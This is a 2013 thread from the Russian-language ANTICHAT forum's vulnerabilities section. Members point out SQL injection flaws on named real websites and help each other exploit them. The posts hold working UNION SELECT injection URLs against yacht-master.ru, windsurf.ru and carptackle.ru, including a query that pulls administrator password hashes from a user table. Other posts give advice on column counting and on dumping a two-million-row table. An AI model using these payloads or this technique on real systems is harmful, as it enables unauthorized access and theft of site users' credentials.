HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 22.07.2013, 23:17
trololoman96
Участник форума
Регистрация: 01.12.2011
Сообщений: 120
С нами: 7604246

Репутация: 55
По умолчанию

По той ссылке нет ничего.

Но кое что забавное есть в другом месте:

http://senpolia.info/catalog/1111111111111111111111111111f1111111111111/

http://senpolia.info/catalog/1111111111111111111111111111f1111111111111/sad

вылетают sql ошибки. Притом если поставить в запрос один из символов '(),=+ ошибки уже нет
 
Ответить с цитированием

  #2  
Старый 23.07.2013, 00:00
Га-Ноцри
Постоянный
Регистрация: 16.10.2011
Сообщений: 326
С нами: 7670486

Репутация: 76
По умолчанию

Цитата:
Сообщение от [AVT  
"]
[AVT] said:
Что-то интересное:
senpolia.info/news/79'/
Как вариант.

 
Ответить с цитированием

  #3  
Старый 23.07.2013, 17:10
rogatiy
Познающий
Регистрация: 03.03.2013
Сообщений: 46
С нами: 6944726

Репутация: 0
По умолчанию

http://www.yacht-master.ru/board/viewphoto.php?p=203

http://www.windsurf.ru/board/viewphoto.php?&p=4885

В обоих случаях морковка вытягивает блайндом имя базы и затухает - таблицы вытащить не удаётся. Крутится ли оно руками?
 
Ответить с цитированием

  #4  
Старый 23.07.2013, 17:52
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами: 9176038

Репутация: 8
По умолчанию

Цитата:
Сообщение от rogatiy  
http://www.yacht-master.ru/board/viewphoto.php?p=203
http://www.windsurf.ru/board/viewphoto.php?&p=4885
В обоих случаях морковка вытягивает блайндом имя базы и затухает - таблицы вытащить не удаётся. Крутится ли оно руками?
Вполне крутабельны.

1-ый линк:

Код:
http://www.yacht-master.ru/board/viewphoto.php?p=-999999'+union+select+1,@@version,3,4,5,6,7,8+--+
2-ой линк:

Код:
http://www.windsurf.ru/board/viewphoto.php?&p=-99999'+union+select+1,@@version,3,4,5,6,7,8+--+
 
Ответить с цитированием

  #5  
Старый 23.07.2013, 19:34
rogatiy
Познающий
Регистрация: 03.03.2013
Сообщений: 46
С нами: 6944726

Репутация: 0
По умолчанию

Благодарю! Сработало.

Хотелось бы вытащить аккаунты администраторов, благо группа для них имеется отдельная.

Код:
http://www.yacht-master.ru/board/viewphoto.php?p=-999999'+union+select+1,U_Status,3,4,5,6,7,8+from+w3t_Users+--+
Как отфильтровать U_Username по U_Status='Administrator'?

Ответ:

Код:
http://yacht-master.ru/board/viewphoto.php?&p=-99999'+union+select+1,U_Password,3,4,5,6,7,8+from+w3t_Users+where+U_Status='Administrator'+--+
 
Ответить с цитированием

  #6  
Старый 23.07.2013, 19:35
InDuStRieS
Постоянный
Регистрация: 15.03.2009
Сообщений: 435
С нами: 9030789

Репутация: 704
По умолчанию

Цитата:
Сообщение от rogatiy  
Благодарю! Сработало.
Хотелось бы вытащить аккаунты администраторов, благо группа для них имеется отдельная.
Код:
http://www.yacht-master.ru/board/viewphoto.php?p=-999999'+union+select+1,U_Status,3,4,5,6,7,8+from+w3t_Users+--+
Как отфильтровать U_Username по U_Status='Administrator'?
используй where
 
Ответить с цитированием

  #7  
Старый 24.07.2013, 23:45
rogatiy
Познающий
Регистрация: 03.03.2013
Сообщений: 46
С нами: 6944726

Репутация: 0
По умолчанию

http://carptackle.ru/plugins/shop/features.php?product=1573

MySQL >5, есть information_schema

Морковка видит blind-inj, не может вытащить user_login из msk_user. Помогите, пожалуйста, подобрать кол-во колонок
 
Ответить с цитированием

  #8  
Старый 25.07.2013, 00:05
antiaudomain
Новичок
Регистрация: 19.05.2011
Сообщений: 0
С нами: 7886486

Репутация: 0
По умолчанию

Цитата:
Сообщение от rogatiy  
http://carptackle.ru/plugins/shop/features.php?product=1573
MySQL >5, есть information_schema
Морковка видит blind-inj, не может вытащить user_login из msk_user. Помогите, пожалуйста, подобрать кол-во колонок
39 же

Код:
http://carptackle.ru/plugins/shop/features.php?product=1573+and+1=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39--
смотри тайтл
 
Ответить с цитированием

  #9  
Старый 26.07.2013, 07:07
1NtR0
Участник форума
Регистрация: 14.04.2007
Сообщений: 197
С нами: 10039659

Репутация: 209
По умолчанию

Есть скуля, на сайте таблица размеров в 2 млн записей

Цитата:
Сообщение от None  
SELECT COUNT(field) FROM table WHERE LENGTH(field)>4
Показывает 2млн записей

Пробую дампить через LIMIT 0,1, дохожу до 80(LIMIT 80,1) и все, дальше данные не выводяться, в чем может быть проблема?
 
Ответить с цитированием

  #10  
Старый 26.07.2013, 07:25
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами: 9176038

Репутация: 8
По умолчанию

Цитата:
Сообщение от 1NtR0  
Есть скуля, на сайте таблица размеров в 2 млн записей
Показывает 2млн записей
Пробую дампить через LIMIT 0,1, дохожу до 80(LIMIT 80,1) и все, дальше данные не выводяться, в чем может быть проблема?
Встречал пару раз такие случаи, попробуй вместо limit использовать where или having.

Для having обязательное условие наличие колонки в group by
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...
×

ESCROW ADMIN PANEL

Загрузка...
Загрузка...